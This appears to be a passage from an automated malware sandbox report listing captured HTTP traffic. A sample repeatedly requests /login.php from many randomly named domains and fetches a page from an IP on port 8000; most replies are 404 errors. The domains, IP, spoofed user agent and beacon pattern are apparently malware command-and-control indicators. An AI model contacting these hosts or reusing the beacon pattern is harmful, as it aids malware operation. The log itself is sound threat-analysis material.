Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lygynud.comCookie: btst=0786bcdb46d67d94d9de9fd3d4d02561|66.23.206.109|1731345850|1731345850|0|1|0; snkz=66.23.206.109
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: pupydeq.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: pupycag.comCookie: btst=44c79a21644891f33b42e7860178412d|66.23.206.109|1731345850|1731345850|0|1|0; snkz=66.23.206.109
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyrysor.com
Source: global trafficHTTP traffic detected: GET /dh/147287063_498544.html HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: 106.15.232.163:8000Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyrysor.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.com
Source: global trafficHTTP traffic detected: GET /dh/147287063_498544.html HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: 106.15.232.163:8000Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: galynuh.comIf-Modified-Since: Wed, 22 Feb 2023 21:25:52 GMTIf-None-Match: "63f68860-251"
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qexyhuv.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyxynyx.comCookie: __tad=1731345856.5241611
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vofycot.comCookie: __tad=1731345856.5179536
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyciz.comCookie: btst=5e81f1ad7c4a96c1877df991163ec825|66.23.206.109|1731345856|1731345856|0|1|0; snkz=66.23.206.109
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyval.com
Source: global trafficHTTP traffic detected: GET /login.php?sub1=20241112-0426-044d-b465-1d078f2f97da HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: ww16.vofycot.comConnection: Keep-AliveCookie: __tad=1731345856.5179536
Source: global trafficHTTP traffic detected: GET /login.php?subid1=20241112-0426-0467-9c46-ef7d79ef9150 HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: ww25.lyxynyx.comConnection: Keep-AliveCookie: __tad=1731345856.5241611
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyval.com
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 11 Nov 2024 17:24:07 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closevary: Accept-Encodingexpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/"cf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GYkiumj9Wri0p%2FHZplvKPW1E887pxGPL%2Fve25cBv%2FCZX7RKytpcypjUou6i7KWdhFM7ABooZ6gocQb6IHrRz1FT%2BKaVNw0I%2BpNhXlEJvy4rUJrUU%2Fvb6ZOADciN9Kw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e0ff959587e431b-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1913&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2823&recv_bytes=881&delivery_rate=1472292&cwnd=251&unsent_bytes=0&cid=a5f7d7368a388f6b&ts=740&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 11 Nov 2024 17:24:09 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closevary: Accept-Encodingexpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/"cf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3FMycW30pxHHKMJHbMi3bkKygzaaSW2Dd8CvJHnYZnxVEND1IoKWJLh5mvDmAkyHUXZVTotwdFu036qMz3BEHiBKeqXvOpVjNBXudTSOHbQ6Mxhc4echZWYmip6uPg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e0ff963287c6a55-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1392&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2824&recv_bytes=881&delivery_rate=2064148&cwnd=228&unsent_bytes=0&cid=3ebd3af10c63491a&ts=1252&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 11 Nov 2024 17:24:13 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closevary: Accept-Encodingexpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0link: <https://lysyvan.com/wp-json/>; rel="https://api.w.org/"server-timing: amp_sanitizer;dur="56.7",amp_style_sanitizer;dur="28.1",amp_tag_and_attribute_sanitizer;dur="21.7",amp_optimizer;dur="32.0"cf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cUoQnXRVY3CgeyMCB8nOONIE6bogyARv%2FN0RB8yvbY7gL3Ja3wFWErCPHzd4hx%2FOQYJ%2BCNy%2BBN0I%2FQh3tEDNLUSF%2F7AwSUpMDh5fcMtJJ8agfTMjMeV6BNJ4lRsvWA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e0ff9742bc02363-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1510&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2826&recv_bytes=881&delivery_rate=1931954&cwnd=251&unsent_bytes=0&cid=15fdb27d35db04cb&ts=1990&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 11 Nov 2024 17:24:16 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closevary: Accept-Encodingexpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0link: <https://lysyvan.com/wp-json/>; rel="https://api.w.org/"server-timing: amp_sanitizer;dur="40.2",amp_style_sanitizer;dur="17.0",amp_tag_and_attribute_sanitizer;dur="19.1",amp_optimizer;dur="16.5"cf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Y18DXrT%2F9z8DtBA23h%2FX3H52NNln7eEl6sslKjOcPSZB3RDBDEvP8rIj%2BWLHipysLFQPIKan28%2FIalWX0p%2Bzfb4GY%2BvGK4lyVAa4rJ4Poca7oeVw9%2F7c3ykdb7hhXA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e0ff985994bc420-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1127&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2825&recv_bytes=881&delivery_rate=2445945&cwnd=250&unsent_bytes=0&cid=47a52306f7354900&ts=1809&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 11 Nov 2024 17:24:28 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closevary: Accept-Encodingexpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/"cf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FV%2F0CO4X%2BNUM2MVKtEbAmAMlFZfeD06dqRZx%2FWrfPyim6RXSsXZdpWofdYr6oGBl3fXciDO%2FtQ9hl56jZcLYaqFawr20HIjWLvmh98eRHHcycRJf%2B9Eq5aZq9tvqJg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e0ff9dc19cac461-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1273&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2823&recv_bytes=881&delivery_rate=2485836&cwnd=251&unsent_bytes=0&cid=8328a6600c482dbd&ts=825&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 11 Nov 2024 17:24:31 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closevary: Accept-Encodingexpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/"cf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GYInVkQAk1Xvke%2BhWXJENW%2FYYIUMCfDNjM7sQzEZ6F0ttiMwQesDUGPkVS%2BpLpODDVkSDIC3KTTjzFaFgQ3Fw23pry%2FDMDCxXKbl76V3MGg0LJZG0vJopElRFhfK0A%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e0ff9e99aa58c1e-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1250&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2824&recv_bytes=881&delivery_rate=2305732&cwnd=246&unsent_bytes=0&cid=1e1901910ae2c204&ts=841&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 11 Nov 2024 17:24:34 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closevary: Accept-Encodingexpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0link: <https://lysyvan.com/wp-json/>; rel="https://api.w.org/"server-timing: amp_sanitizer;dur="84.3",amp_style_sanitizer;dur="40.6",amp_tag_and_attribute_sanitizer;dur="38.1",amp_optimizer;dur="22.2"cf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TJiLYd4KKBd%2Fm7d%2BhBa9drInBBwIM4663Z7ZrbKl2D7ZKJPHW%2B0gd1PnkggHXThGKW%2FkxLs0QxD%2F2XgJ8dwNTrNwYoSK8uTywtDjgvGWPFEo59mPwEBFyeAHEYmuLA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e0ff9fa5f0c0f5b-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1240&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2826&recv_bytes=881&delivery_rate=2112326&cwnd=251&unsent_bytes=0&cid=e9b2a8aaf2341270&ts=1571&x=0"
Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
Date: Mon, 11 Nov 2024 17:24:36 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
vary: Accept-Encoding
expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
link: <https://lysyvan.com/wp-json/>; rel="https://api.w.org/"
server-timing: amp_sanitizer;dur="34.2",amp_style_sanitizer;dur="16.3",amp_tag_and_attribute_sanitizer;dur="13.9",amp_optimizer;dur="17.2"
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kus9P3y2%2BRqvAVpyEpaJbKgn68tLj1%2Bji4%2BAtNVBXpmuJbq0nb0w160qXy1KZOatWKVJpfdNsQrddTj6eftlrA8TO0BAZmgs%2BdO2mANgqhVgubhVbcamjvpbqxPuZw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e0ffa09bfebac30-YYZ
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=12237&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2826&recv_bytes=881&delivery_rate=236678&cwnd=37&unsent_bytes=0&cid=1a8a2e71f1f2f113&ts=1547&x=0"
Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
Date: Mon, 11 Nov 2024 17:25:56 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
vary: Accept-Encoding
expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/"
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1q%2FLtAjLrraWfZWMWr6k9FNeLWhoeB6mvFaA4%2FPSwWbjHXUmeH04%2FkkSuj%2BX9M0UVbfUxC74hrhiT%2FFbwnSOw%2Ffq%2B6K8ezY8Hp4XS7%2FpPuxT0oegprFZw1wbgaHK%2FQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e0ffbffeadb182d-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1157&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2824&recv_bytes=881&delivery_rate=2473099&cwnd=251&unsent_bytes=0&cid=e42556b4c044e8f3&ts=796&x=0"
Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
Date: Mon, 11 Nov 2024 17:25:58 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
vary: Accept-Encoding
expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/"
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3uzluE%2B5GVqzzY2kY8vJvXK4WazQ5i0dF51uloPWmsOqWjIlA8Q7rB88OEc4foIrLrO1ygkx71D9HS%2BY%2FqOIopG8qWPHZ5R02uEgUgg8fhN%2FquO1rvC4TyTrboNdqg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e0ffc0a4e164325-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1198&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2823&recv_bytes=881&delivery_rate=2456318&cwnd=251&unsent_bytes=0&cid=71331d2500b9e766&ts=781&x=0"
Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
Date: Mon, 11 Nov 2024 17:26:00 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
vary: Accept-Encoding
expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
link: <https://lysyvan.com/wp-json/>; rel="https://api.w.org/"
server-timing: amp_sanitizer;dur="39.8",amp_style_sanitizer;dur="14.6",amp_tag_and_attribute_sanitizer;dur="19.8",amp_optimizer;dur="20.4"
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=x1oh8r9mKlLNoJYvnWdzuKvm4aYVeUyhRNhyQczsrQQT%2BRyquiLJCABmPtPcEWccV2LDyGjlxsoWtRgi1OuNlv0flSzl0GZZnqDH5SvynmSCCXAItng4Vhrt2yuZug%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e0ffc174951ac06-YYZ
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=11837&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2827&recv_bytes=881&delivery_rate=243955&cwnd=37&unsent_bytes=0&cid=49c92739f32545da&ts=1431&x=0"
Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
Date: Mon, 11 Nov 2024 17:26:03 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
vary: Accept-Encoding
expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
link: <https://lysyvan.com/wp-json/>; rel="https://api.w.org/"
server-timing: amp_sanitizer;dur="38.6",amp_style_sanitizer;dur="18.9",amp_tag_and_attribute_sanitizer;dur="14.8",amp_optimizer;dur="20.4"
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1pdnshuhj2FQouaovKGIqb4cBOZWU16Wjj7TZogvepW5jq5ObdluKzqGVVY0y96sEdnyZh1AbDDgrYHKCafSuaIxkgE2vE7HDmHTW6pof9CkeJOYj59nHvS1gdaLDw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e0ffc27e9010c96-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1169&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2826&recv_bytes=881&delivery_rate=2456318&cwnd=251&unsent_bytes=0&cid=2a9a016731b5290c&ts=1456&x=0"
Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 11 Nov 2024 17:24:00 GMT
Content-Length: 1245
Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
Server: nginx/1.14.0 (Ubuntu)
Date: Mon, 11 Nov 2024 17:24:05 GMT
Content-Type: text/html
Content-Length: 580
Connection: keep-alive
Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
Server: nginx
Date: Mon, 11 Nov 2024 17:24:05 GMT
Content-Type: text/html
Content-Length: 548
Connection: keep-alive
Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
Server: nginx
Date: Mon, 11 Nov 2024 17:24:06 GMT
Content-Type: text/html
Content-Length: 548
Connection: keep-alive
Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
Server: openresty/1.21.4.3
Date: Mon, 11 Nov 2024 17:24:12 GMT
Content-Type: text/html
Content-Length: 561
Connection: keep-alive
Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
Server: nginx
Date: Mon, 11 Nov 2024 17:24:17 GMT
Content-Type: text/html
Content-Length: 138
Connection: keep-alive
ETag: "663ee226-8a"
Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
Server: nginx/1.14.0 (Ubuntu)
Date: Mon, 11 Nov 2024 17:24:26 GMT
Content-Type: text/html
Content-Length: 580
Connection: keep-alive
Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
Server: nginx/1.14.0 (Ubuntu)
Date: Mon, 11 Nov 2024 17:24:27 GMT
Content-Type: text/html
Content-Length: 580
Connection: keep-alive
Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
Server: nginx/1.14.0 (Ubuntu)
Date: Mon, 11 Nov 2024 17:24:27 GMT
Content-Type: text/html
Content-Length: 580
Connection: keep-alive
Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 11 Nov 2024 17:24:21 GMT
Content-Length: 1245
Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
Server: nginx
Date: Mon, 11 Nov 2024 17:24:27 GMT
Content-Type: text/html
Content-Length: 548
Connection: keep-alive
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 11 Nov 2024 17:24:22 GMT
Content-Length: 1245
Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
Server: nginx
Date: Mon, 11 Nov 2024 17:24:27 GMT
Content-Type: text/html
Content-Length: 548
Connection: keep-alive
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
Server: openresty/1.21.4.3
Date: Mon, 11 Nov 2024 17:24:31 GMT
Content-Type: text/html
Content-Length: 561
Connection: keep-alive
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.21.4.3</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
Server: openresty/1.21.4.3
Date: Mon, 11 Nov 2024 17:24:33 GMT
Content-Type: text/html
Content-Length: 561
Connection: keep-alive
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.21.4.3</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
Server: nginx
Date: Mon, 11 Nov 2024 17:24:37 GMT
Content-Type: text/html
Content-Length: 138
Connection: keep-alive
ETag: "663ee226-8a"
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
Server: nginx
Date: Mon, 11 Nov 2024 17:24:37 GMT
Content-Type: text/html
Content-Length: 138
Connection: keep-alive
ETag: "663ee226-8a"
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
Server: nginx/1.14.0 (Ubuntu)
Date: Mon, 11 Nov 2024 17:25:54 GMT
Content-Type: text/html
Content-Length: 580
Connection: keep-alive
Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/7.5
